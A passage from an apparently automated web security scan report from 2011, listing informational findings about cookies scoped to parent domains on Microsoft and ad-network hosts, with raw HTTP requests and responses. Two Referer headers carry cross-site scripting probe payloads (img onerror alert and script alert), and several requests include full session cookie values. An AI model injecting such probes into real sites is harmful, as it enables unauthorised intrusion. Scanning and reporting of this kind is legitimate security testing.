Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 35
Date: Sat, 23 Jul 2011 14:52:39 GMT
Server: QS

GIF89a.......,.................D..;

10.52. http://code.msdn.microsoft.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://code.msdn.microsoft.com
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

msdn=L=1033; domain=.microsoft.com; expires=Tue, 23-Aug-2011 04:46:49 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: code.msdn.microsoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://social.msdn.microsoft.com/search/en-US?query=84e17%3cimg%2520src%253da%2520onerror%253dalert%281%29%3e8704c19d382%3d1
Cookie: WT_FPC=id=173.193.214.243-3409883184.30164746:lv=1311385526307:ss=1311385526307; MUID=1FDD375D440B439987A467BECD35D2C6; MSID=Microsoft.CreationDate=07/20/2011 18:28:20&Microsoft.LastVisitDate=07/23/2011 04:46:16&Microsoft.VisitStartDate=07/23/2011 04:45:39&Microsoft.CookieId=83f3d6dd-9e1a-4fc0-be7f-977f10276d9f&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=35&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0710-6455-2061-8144; MC1=GUID=7d82853ea5283f499a9e3add3769434b&HASH=3e85&LV=20117&V=3; A=I&I=AxUFAAAAAADHCAAAdQ+MX09BAsRu9umGsxl6kw!!&GO=244; omniID=1311187255305_231e_6145_d5f9_14f277e18b3d; WT_NVR_RU=0=technet|msdn:1=:2=; msdn=L=1033; mcI=Thu, 28 Jul 2011 23:10:45 GMT; s_cc=true; s_sq=%5B%5BB%5D%5D; WT_NVR=0=/:1=en-us:2=en-us/vstudio; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=bf47075d-3b34-4779-ae6c-f0e3de5d879a&Microsoft.CreationDate=07/23/2011 04:45:39&Microsoft.LastVisitDate=07/23/2011 04:46:16&Microsoft.NumberOfVisits=3&SessionCookie.Id=C564621410F0B8D8787DE13565284D18; MS0=d41684a2852d4d37960ea64662e3fffb

Response

10.53. http://code.msdn.microsoft.com/globalresources/scripts/ms2.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://code.msdn.microsoft.com
Path:	/globalresources/scripts/ms2.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

msdn=L=1033; domain=.microsoft.com; expires=Tue, 23-Aug-2011 04:47:38 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /globalresources/scripts/ms2.js HTTP/1.1
Host: code.msdn.microsoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://code.msdn.microsoft.com/
Cookie: WT_FPC=id=173.193.214.243-3409883184.30164746:lv=1311385526307:ss=1311385526307; MUID=1FDD375D440B439987A467BECD35D2C6; MSID=Microsoft.CreationDate=07/20/2011 18:28:20&Microsoft.LastVisitDate=07/23/2011 04:46:16&Microsoft.VisitStartDate=07/23/2011 04:45:39&Microsoft.CookieId=83f3d6dd-9e1a-4fc0-be7f-977f10276d9f&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=35&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0710-6455-2061-8144; MC1=GUID=7d82853ea5283f499a9e3add3769434b&HASH=3e85&LV=20117&V=3; A=I&I=AxUFAAAAAADHCAAAdQ+MX09BAsRu9umGsxl6kw!!&GO=244; omniID=1311187255305_231e_6145_d5f9_14f277e18b3d; WT_NVR_RU=0=technet|msdn:1=:2=; msdn=L=1033; mcI=Thu, 28 Jul 2011 23:10:45 GMT; s_cc=true; s_sq=%5B%5BB%5D%5D; WT_NVR=0=/:1=en-us:2=en-us/vstudio; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=bf47075d-3b34-4779-ae6c-f0e3de5d879a&Microsoft.CreationDate=07/23/2011 04:45:39&Microsoft.LastVisitDate=07/23/2011 04:46:16&Microsoft.NumberOfVisits=3&SessionCookie.Id=C564621410F0B8D8787DE13565284D18; MS0=d41684a2852d4d37960ea64662e3fffb; TimezoneOffset=-5

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=15552000
Content-Type: application/x-javascript
Last-Modified: Thu, 14 Jul 2011 19:39:26 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Set-Cookie: msdn=L=1033; domain=.microsoft.com; expires=Tue, 23-Aug-2011 04:47:38 GMT; path=/
Server: GALS02
X-Powered-By: ASP.NET
Date: Sat, 23 Jul 2011 04:47:38 GMT
Content-Length: 12210

var fl = 0,
sessionId = "",
sessionDuration = 1800000,
sessionCookieName = "MC0",
cookieDisabled = 0,
metaTags = "",
customTags = "",
pvInfo = [],
clickInfo = "",
q
...[SNIP]...

10.54. http://code.msdn.microsoft.com/site/upload previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://code.msdn.microsoft.com
Path:	/site/upload

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

msdn=L=1033; domain=.microsoft.com; expires=Tue, 23-Aug-2011 04:47:53 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /site/upload HTTP/1.1
Host: code.msdn.microsoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://code.msdn.microsoft.com/
Cookie: WT_FPC=id=173.193.214.243-3409883184.30164746:lv=1311385526307:ss=1311385526307; MUID=1FDD375D440B439987A467BECD35D2C6; MSID=Microsoft.CreationDate=07/20/2011 18:28:20&Microsoft.LastVisitDate=07/23/2011 04:47:41&Microsoft.VisitStartDate=07/23/2011 04:45:39&Microsoft.CookieId=83f3d6dd-9e1a-4fc0-be7f-977f10276d9f&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=36&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0710-6455-2061-8144; MC1=GUID=7d82853ea5283f499a9e3add3769434b&HASH=3e85&LV=20117&V=3; A=I&I=AxUFAAAAAADHCAAAdQ+MX09BAsRu9umGsxl6kw!!&GO=244; omniID=1311187255305_231e_6145_d5f9_14f277e18b3d; WT_NVR_RU=0=technet|msdn:1=:2=; msdn=L=1033; mcI=Thu, 28 Jul 2011 23:10:45 GMT; s_cc=true; s_sq=%5B%5BB%5D%5D; WT_NVR=0=/:1=en-us:2=en-us/vstudio; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=bf47075d-3b34-4779-ae6c-f0e3de5d879a&Microsoft.CreationDate=07/23/2011 04:45:39&Microsoft.LastVisitDate=07/23/2011 04:47:41&Microsoft.NumberOfVisits=4&SessionCookie.Id=C564621410F0B8D8787DE13565284D18; MS0=d41684a2852d4d37960ea64662e3fffb; TimezoneOffset=-5; MC0=1311396466349

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: https://login.live.com/login.srf?wa=wsignin1.0&wtrealm=code.msdn.microsoft.com&wreply=https%3a%2f%2fcode.msdn.microsoft.com%2fsite%2fupload%3fstoAI%3d10&wp=MBI_FED_SSL&wlcxt=microsoft%24microsoft%24microsoft
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
Set-Cookie: msdn=L=1033; domain=.microsoft.com; expires=Tue, 23-Aug-2011 04:47:53 GMT; path=/
Server: GALS03
X-Powered-By: ASP.NET
Date: Sat, 23 Jul 2011 04:47:53 GMT
Content-Length: 340

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.live.com/login.srf?wa=wsignin1.0&wtrealm=code.msdn.microsoft.com&wreply=https%3a%2f%2fcode.msdn
...[SNIP]...

10.55. http://community.spiceworks.com/r/595 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://community.spiceworks.com
Path:	/r/595

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

swcls=173.193.214.243.1311280492510052; path=/; domain=.spiceworks.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/595 HTTP/1.1
Host: community.spiceworks.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.microsoft.com/en-us/security_essentials/default.aspx?bladeFlyout=Share&f9857%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E256ae1bee6f=1
Cookie: spiceworks-community=b538f4c9cbdfd567999da83324777623

Response

HTTP/1.1 302 Found
Date: Thu, 21 Jul 2011 20:34:52 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.5
X-Runtime: 8
Cache-Control: no-cache
Set-Cookie: spiceworks-community=b538f4c9cbdfd567999da83324777623; path=/; expires=Sat, 21 Jul 2012 20:34:52 GMT; HttpOnly
Set-Cookie: swcls=173.193.214.243.1311280492510052; path=/; domain=.spiceworks.com
Location: http://banners.spiceworks.com/banners/microsoft/1x1_security_essentials.png
Status: 302
Vary: Accept-Encoding,User-Agent
Content-Length: 141
Connection: close
Content-Type: text/html; charset=utf-8

<html><body>You are being <a href="http://banners.spiceworks.com/banners/microsoft/1x1_security_essentials.png">redirected</a>.</body></html>

10.56. http://contextlinks.netseer.com/dsatserving2/servlet/BannerServer previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://contextlinks.netseer.com
Path:	/dsatserving2/servlet/BannerServer

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

netseer_v3_gi="1005,11065,www.lifescript.com,0,0,1,imp3fd99cd273cceae2,1311276179748,"; Version=1; Domain=.netseer.com; Max-Age=31536000; Expires=Fri, 20-Jul-2012 19:22:59 GMT; Path=/
netseer_v3_vi="2:usre43bc794a5e34d6f:1311276179410"; Version=1; Domain=.netseer.com; Max-Age=31536000; Expires=Fri, 20-Jul-2012 19:22:59 GMT; Path=/
netseer_v3_lvi="2:usre43bc794a5e34d6f:1311276179410,1311276179749,aHR0cDovL3d3dy5saWZlc2NyaXB0LmNvbS9oZWFsdGgvY29uZGl0aW9ucy9hZGQvaG93X3RvX3F1aWV0X3RoZV9zeW1wdG9tc19vZl9hZHVsdF9hZGhkLmFzcHg,US-TX-623-Dallas,0,0"; Version=1; Domain=.netseer.com; Max-Age=31536000; Expires=Fri, 20-Jul-2012 19:22:59 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dsatserving2/servlet/BannerServer?tagid=1494&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fhow_to_quiet_the_symptoms_of_adult_adhd.aspx&trurl=http%3A%2F%2Fad.doubleclick.net%2Fclick%3Bh%3Dv8%2F3b4b%2F3%2F0%2F*%2Fk%3B227818253%3B0-0%3B0%3B31210306%3B748-470%2F60%3B37939276%2F37957052%2F1%3B%3B~okv%3D%3Bpath%3Dhealth%2Fconditions%2Fadd%2Fhow_to_quiet_the_symptoms_of_adult_adhd%3Bcontentid%3D7f47b713%3Babr%3D!webtvs%3Btax%3Dadhd%3Btax%3Dadhd_adult%3Btax%3Dadult_adhd%3Bcamp%3Dadhd%3Bcamp%3Dadhd_adult%3Bpos%3Dpencil%3Btile%3D20%3B~sscs%3D%3F&rfd=www.lifescript.com&adh=60&adw=470&frd=1311276185290 HTTP/1.1
Host: contextlinks.netseer.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/adcontrol.htm?adj/lfs2.lifescript/conditions;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=pencil;tile=20;sz=470x60;ord=101352252258050

Response

10.57. http://cspix.media6degrees.com/orbserv/hbpix previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cspix.media6degrees.com
Path:	/orbserv/hbpix

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

clid=2looqmz01170z25a5jiwl0gq03ouk00b5o020u0b70b; Domain=media6degrees.com; Expires=Thu, 19-Jan-2012 13:15:19 GMT; Path=/
vstcnt=41a6010r024ef19118e10024fliz118e1002; Domain=media6degrees.com; Expires=Thu, 19-Jan-2012 13:15:19 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4e282ba90cea006f&curl=http%3a%2f%2fwww.seashepherd.org%2fnews-and-media%2f2011%2f07%2f19%2femergency-sos-from-captain-paul-watson-save-our-ship-1263 HTTP/1.1
Host: cspix.media6degrees.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh46.html
Cookie: clid=2looqmz01170z25a5jiwl0gq00cqm0095m090u09709; ipinfo=2looqmz0zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrfdfbsgynlre.pbz0; acs=016020a0e0f0g0h1looqmzxzt1slxzt1slxzt1slxzt1slxzt1sl; rdrlst=4031ar0loorfk000000025m0215ztloorfk000000025m020drhloorfk000000025m02; sglst=2030sdleloorfk000000025m020u027025noloorfk000000025m020u02702fysloorfk000000025m020u02702; vstcnt=41a6010r014ef19118e1002

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: clid=2looqmz01170z25a5jiwl0gq03ouk00b5o020u0b70b; Domain=media6degrees.com; Expires=Thu, 19-Jan-2012 13:15:19 GMT; Path=/
Set-Cookie: orblb=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: vstcnt=41a6010r024ef19118e10024fliz118e1002; Domain=media6degrees.com; Expires=Thu, 19-Jan-2012 13:15:19 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Sat, 23 Jul 2011 13:15:18 GMT
Connection: close

GIF89a.............!.......,...........D..;

10.58. http://d.audienceiq.com/r/dm/mkt/73/mpid//mpuid/4146544210108361256/mchpid/3/url/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d.audienceiq.com
Path:	/r/dm/mkt/73/mpid//mpuid/4146544210108361256/mchpid/3/url/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

uid=3197465033032759420; Domain=.audienceiq.com; Expires=Tue, 17-Jan-2012 18:42:59 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/dm/mkt/73/mpid//mpuid/4146544210108361256/mchpid/3/url/ HTTP/1.1
Host: d.audienceiq.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html?p=25659&s=26922
Cookie: uid=3197465033032759420

Response

10.59. http://gam.adnxs.com/gtj previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://gam.adnxs.com
Path:	/gtj

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

uuid2=6516234360771219075; path=/; expires=Wed, 19-Oct-2011 18:00:23 GMT; domain=.adnxs.com; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gtj?member=12&inv_codes=MYB_1x1_Games_Skin_Home,MYB_728x90_Games_Home,MYB_300x250_Games_Home,MYB_300x250_Games_Home_2,MYB_728x90_Games_Home_2&within_iframe=0&flash=0&referrer=http%3A//games.myyearbook.com/ HTTP/1.1
Host: gam.adnxs.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: sess=1; uuid2=6516234360771219075; anj=Kfu=8fG5+^Cxrx)0s]#%2L_'x%SEV/hnK]18Ep.I>u3?!7G'6v$WPt[fR4#aoQ.`e#:wJBP@1>+^X$?SUr+(fV+'zvLnT#=)OqIw

Response

10.60. http://home.live.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://home.live.com
Path:	/search

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

E=P:0B3c+wkXzog=:owBaSuE89cZK/T/ADgs5WcoVfC7zm9cBrz4tVkiAY0I=:F; domain=.live.com; path=/
wla42=cHJveHktYmF5LnB2dC1jb250YWN0cy5tc24uY29tfGJ5MioxLDUxMEE5NzRFQ0I5NEZCMzAsMSwwLDB8MSxERDY0OUVBRjNDNTQyMjE3LCwsMHwxLDlDOTgzOEU4RTk1OEVGRkUsMSwsMHwxLDY5RjQwMDJDN0I3OTUzQSwxLDAsMA==; domain=live.com; expires=Sat, 30-Jul-2011 04:41:55 GMT; path=/
wla42=cHJveHktYmF5LnB2dC1jb250YWN0cy5tc24uY29tfGJ5MioxLDUxMEE5NzRFQ0I5NEZCMzAsMSwwLDB8MSxERDY0OUVBRjNDNTQyMjE3LCwsMHwxLDlDOTgzOEU4RTk1OEVGRkUsMSwsMHwxLDY5RjQwMDJDN0I3OTUzQSwxLDAsMA==; domain=live.com; expires=Sat, 30-Jul-2011 04:41:55 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /search?query=h02332 HTTP/1.1
Host: home.live.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://home.live.com/search/hip?query=h02332
Cookie: mkt0=en-US; drua=9c9838e8e958effe-1; wlidperf=throughput=5&latency=2133; wla42=cHJveHktYmF5LnB2dC1jb250YWN0cy5tc24uY29tfGJ5MioxLDUxMEE5NzRFQ0I5NEZCMzAsMSwwLDB8MSxERDY0OUVBRjNDNTQyMjE3LCwsMHwxLDlDOTgzOEU4RTk1OEVGRkUsMSwsMHwxLDY5RjQwMDJDN0I3OTUzQSwxLDAsMA==; E=P:Rfof+gkXzog=:tBEPCApxC69fuIYFCVR4xU2uLersL84n5w03SAmLAn0=:F; xid=5aa0c1fb-caa3-40df-b5b6-4e2e6656cc32&&SN2xxxxxC516&247; xidseq=9; wlv=A|_-d:s*UM6wBg.2+1+0+3; BP=l=CXP.Home&FR=&ST=; MUID=1FDD375D440B439987A467BECD35D2C6; ANON=A=09C89511BF100DC2E6BE1C66FFFFFFFF&E=b48&W=1; NAP=V=1.9&E=aee&C=1y2a1t4TVNCPNy9y9DmWgYg0jNzUVxeHBpRB9YpCzs7AkrhVIlPNyg&W=1; HIPSession=41mWBOemPC4NZ9mfMNJAeqsJaqNNeXl*HshHpqa5B4vSZlDVTkGlFo4D5gXJ4tj8JD2vxoQ!ZeLZWAPWKE9iA1jWY!YWMvFRzag8kQV93cifQ$; SearchHip=token=FwjQTuRuGE6j1T+Kw4Oo02EUzxJqc2oRS1Myn3s1dJU=4&time=634469677129510854

Response

10.61. http://home.live.com/search/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://home.live.com
Path:	/search/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

E=P:N72z3gkXzog=:OXoPt1c/aECEyuMTyC6Y0qFMAa+XdjrgGNA8RpVhIjI=:F; domain=.live.com; path=/
wla42=cHJveHktYmF5LnB2dC1jb250YWN0cy5tc24uY29tfGJ5MioxLDUxMEE5NzRFQ0I5NEZCMzAsMSwwLDB8MSxERDY0OUVBRjNDNTQyMjE3LCwsMHwxLDlDOTgzOEU4RTk1OEVGRkUsMSwsMHwxLDY5RjQwMDJDN0I3OTUzQSwxLDAsMA==; domain=live.com; expires=Sat, 30-Jul-2011 04:41:06 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /search/?query=h02332 HTTP/1.1
Host: home.live.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://profile.live.com/cid-9c9838e8e958effe/
Cookie: mkt0=en-US; drua=9c9838e8e958effe-1; wlidperf=throughput=5&latency=2133; wla42=cHJveHktYmF5LnB2dC1jb250YWN0cy5tc24uY29tfGJ5MioxLDUxMEE5NzRFQ0I5NEZCMzAsMSwwLDB8MSxERDY0OUVBRjNDNTQyMjE3LCwsMHwxLDlDOTgzOEU4RTk1OEVGRkUsMSwsMHwxLDY5RjQwMDJDN0I3OTUzQSwxLDAsMA==; E=P:dAvS2QkXzog=:wDlHQNKC6BtX3Sd8z9qehKx338sakSPU9ASd0deoPwE=:F; xid=5aa0c1fb-caa3-40df-b5b6-4e2e6656cc32&&SN2xxxxxC516&247; xidseq=5; wlv=A|_-d:s*UM6wBg.2+1+0+3; BP=l=SN.Profile&FR=&ST=; LD=5aa0c1fb-caa3-40df-b5b6-4e2e6656cc32_0044657a12f_13263_1311396056071=L3146; MUID=1FDD375D440B439987A467BECD35D2C6; ANON=A=09C89511BF100DC2E6BE1C66FFFFFFFF&E=b48&W=1; NAP=V=1.9&E=aee&C=1y2a1t4TVNCPNy9y9DmWgYg0jNzUVxeHBpRB9YpCzs7AkrhVIlPNyg&W=1

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Location: http://home.live.com/search/hip?query=h02332
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: xidseq=7; domain=.live.com; path=/
Set-Cookie: LD=; domain=.live.com; expires=Sat, 23-Jul-2011 03:01:06 GMT; path=/
Set-Cookie: E=P:N72z3gkXzog=:OXoPt1c/aECEyuMTyC6Y0qFMAa+XdjrgGNA8RpVhIjI=:F; domain=.live.com; path=/
Set-Cookie: wla42=cHJveHktYmF5LnB2dC1jb250YWN0cy5tc24uY29tfGJ5MioxLDUxMEE5NzRFQ0I5NEZCMzAsMSwwLDB8MSxERDY0OUVBRjNDNTQyMjE3LCwsMHwxLDlDOTgzOEU4RTk1OEVGRkUsMSwsMHwxLDY5RjQwMDJDN0I3OTUzQSwxLDAsMA==; domain=live.com; expires=Sat, 30-Jul-2011 04:41:06 GMT; path=/
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sat, 23 Jul 2011 04:41:06 GMT
Content-Length: 161

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://home.live.com/search/hip?query=h02332">here</a>.</h2>
</body></html>

10.62. http://home.live.com/search/hip previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://home.live.com
Path:	/search/hip

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

E=P:TdoD4AkXzog=:d82/KsN7BtzJeKTvolKzfuXRiEeEBqcRsl5Pu4gx3SU=:F; domain=.live.com; path=/
wla42=YnkyfHByb3h5LWJheS5wdnQtY29udGFjdHMubXNuLmNvbSoxLDlDOTgzOEU4RTk1OEVGRkUsMCwsMHwxLDY5RjQwMDJDN0I3OTUzQSwwLDEsMHwxLDUxMEE5NzRFQ0I5NEZCMzAsMCwxLDB8MSxERDY0OUVBRjNDNTQyMjE3LCwsMA==; domain=live.com; expires=Sat, 30-Jul-2011 04:41:08 GMT; path=/
wla42=YnkyfHByb3h5LWJheS5wdnQtY29udGFjdHMubXNuLmNvbSoxLDlDOTgzOEU4RTk1OEVGRkUsMCwsMHwxLDY5RjQwMDJDN0I3OTUzQSwwLDEsMHwxLDUxMEE5NzRFQ0I5NEZCMzAsMCwxLDB8MSxERDY0OUVBRjNDNTQyMjE3LCwsMA==; domain=live.com; expires=Sat, 30-Jul-2011 04:41:08 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /search/hip?query=h02332 HTTP/1.1
Host: home.live.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://profile.live.com/cid-9c9838e8e958effe/
Cookie: mkt0=en-US; drua=9c9838e8e958effe-1; wlidperf=throughput=5&latency=2133; wla42=YnkyfHByb3h5LWJheS5wdnQtY29udGFjdHMubXNuLmNvbSoxLDlDOTgzOEU4RTk1OEVGRkUsMCwsMHwxLDY5RjQwMDJDN0I3OTUzQSwwLDEsMHwxLDUxMEE5NzRFQ0I5NEZCMzAsMCwxLDB8MSxERDY0OUVBRjNDNTQyMjE3LCwsMA==; E=P:QI7q3gkXzog=:usFoqOpyTWXJSSEB+csdc51idn/FZHN4MbOmL9xeDAc=:F; xid=5aa0c1fb-caa3-40df-b5b6-4e2e6656cc32&&SN2xxxxxC516&247; xidseq=6; wlv=A|_-d:s*UM6wBg.2+1+0+3; BP=l=SN.Profile&FR=&ST=; MUID=1FDD375D440B439987A467BECD35D2C6; ANON=A=09C89511BF100DC2E6BE1C66FFFFFFFF&E=b48&W=1; NAP=V=1.9&E=aee&C=1y2a1t4TVNCPNy9y9DmWgYg0jNzUVxeHBpRB9YpCzs7AkrhVIlPNyg&W=1

Response

10.63. http://i.w55c.net/ping_match.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://i.w55c.net
Path:	/ping_match.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wfivefivec=0892d3fc-c93f-4985-8ab2-420c545c19b6;Path=/;Domain=.w55c.net;Expires=Sat, 20-Jul-13 18:00:58 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

